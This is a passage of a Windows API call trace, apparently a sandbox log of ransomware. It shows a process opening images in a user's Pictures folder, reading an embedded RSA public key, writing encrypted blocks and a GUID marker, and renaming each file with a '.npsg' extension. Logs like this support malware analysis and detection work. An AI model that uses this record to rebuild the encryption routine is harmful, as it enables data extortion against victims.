0x3373568 [0238.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400a10 [0238.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0238.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0238.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0238.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0238.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0238.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0238.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34009b0 [0238.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0238.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0238.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0238.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0238.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0238.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34009c8 [0238.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0238.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0238.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0238.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400998 [0238.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0238.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400a28 [0238.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0238.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0238.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34009f8 [0238.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34009e0 [0238.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400a40 [0238.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34009e0 | out: hHeap=0x620000) returned 1 [0238.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34009e0 [0238.320] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xbfa3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.320] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.321] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.321] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.321] CloseHandle (hObject=0x644) returned 1 [0238.324] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e5f8 [0238.324] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b85cd0 [0238.324] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lVTDtn H8OPDt\\NKsY6vRRu.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lvtdtn h8opdt\\nksy6vrru.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lVTDtn H8OPDt\\NKsY6vRRu.jpg.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lvtdtn h8opdt\\nksy6vrru.jpg.npsg")) returned 1 [0238.326] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a06fd20, ftCreationTime.dwHighDateTime=0x1d5c2e9, ftLastAccessTime.dwLowDateTime=0xcd538fd0, ftLastAccessTime.dwHighDateTime=0x1d5bcd1, ftLastWriteTime.dwLowDateTime=0xcd538fd0, ftLastWriteTime.dwHighDateTime=0x1d5bcd1, nFileSizeHigh=0x0, nFileSizeLow=0x2976, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="r7Uo8kBmz.png", cAlternateFileName="R7UO8K~1.PNG")) returned 1 [0238.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x70df58 [0238.326] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lVTDtn H8OPDt\\r7Uo8kBmz.png") returned=".png" [0238.326] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lVTDtn H8OPDt\\r7Uo8kBmz.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lvtdtn h8opdt\\r7uo8kbmz.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.327] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=10614) returned 1 [0238.327] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.332] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x2950, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.332] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.334] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x2976, lpOverlapped=0x0) returned 1 [0238.335] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0238.335] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.335] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.335] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.336] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.336] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.336] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0238.336] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.336] GetLastError () returned 0x0 [0238.336] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.336] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.336] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.336] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.336] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.336] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0238.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0238.337] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x2976, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.337] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.337] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.337] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.337] CloseHandle (hObject=0x644) returned 1 [0238.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e5f8 [0238.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b85cd0 [0238.340] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lVTDtn H8OPDt\\r7Uo8kBmz.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lvtdtn h8opdt\\r7uo8kbmz.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lVTDtn H8OPDt\\r7Uo8kBmz.png.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lvtdtn h8opdt\\r7uo8kbmz.png.npsg")) returned 1 [0238.342] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa64a7f70, ftCreationTime.dwHighDateTime=0x1d5bbe6, ftLastAccessTime.dwLowDateTime=0xcf79f80, ftLastAccessTime.dwHighDateTime=0x1d5ba81, ftLastWriteTime.dwLowDateTime=0xcf79f80, ftLastWriteTime.dwHighDateTime=0x1d5ba81, nFileSizeHigh=0x0, nFileSizeLow=0x1628b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vJNrdmrANWfXlDJT.png", cAlternateFileName="VJNRDM~1.PNG")) returned 1 [0238.342] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.342] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x70df58 [0238.342] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lVTDtn H8OPDt\\vJNrdmrANWfXlDJT.png") returned=".png" [0238.342] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lVTDtn H8OPDt\\vJNrdmrANWfXlDJT.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lvtdtn h8opdt\\vjnrdmranwfxldjt.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.342] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=90763) returned 1 [0238.342] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.344] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x16265, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.344] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.346] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.346] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x1628b, lpOverlapped=0x0) returned 1 [0238.347] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0238.347] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.347] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.347] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.348] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.348] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.348] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0238.348] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.348] GetLastError () returned 0x0 [0238.348] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.348] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.348] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.348] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.348] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.349] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0238.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0238.350] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x1628b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.350] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.350] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.350] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.350] CloseHandle (hObject=0x644) returned 1 [0238.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d7c0 [0238.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x3b85cd0 [0238.351] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lVTDtn H8OPDt\\vJNrdmrANWfXlDJT.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lvtdtn h8opdt\\vjnrdmranwfxldjt.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lVTDtn H8OPDt\\vJNrdmrANWfXlDJT.png.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lvtdtn h8opdt\\vjnrdmranwfxldjt.png.npsg")) returned 1 [0238.353] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa64a7f70, ftCreationTime.dwHighDateTime=0x1d5bbe6, ftLastAccessTime.dwLowDateTime=0xcf79f80, ftLastAccessTime.dwHighDateTime=0x1d5ba81, ftLastWriteTime.dwLowDateTime=0xcf79f80, ftLastWriteTime.dwHighDateTime=0x1d5ba81, nFileSizeHigh=0x0, nFileSizeLow=0x1628b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vJNrdmrANWfXlDJT.png", cAlternateFileName="VJNRDM~1.PNG")) returned 0 [0238.353] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0238.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0238.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0238.353] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0238.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0238.353] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0238.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0238.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, 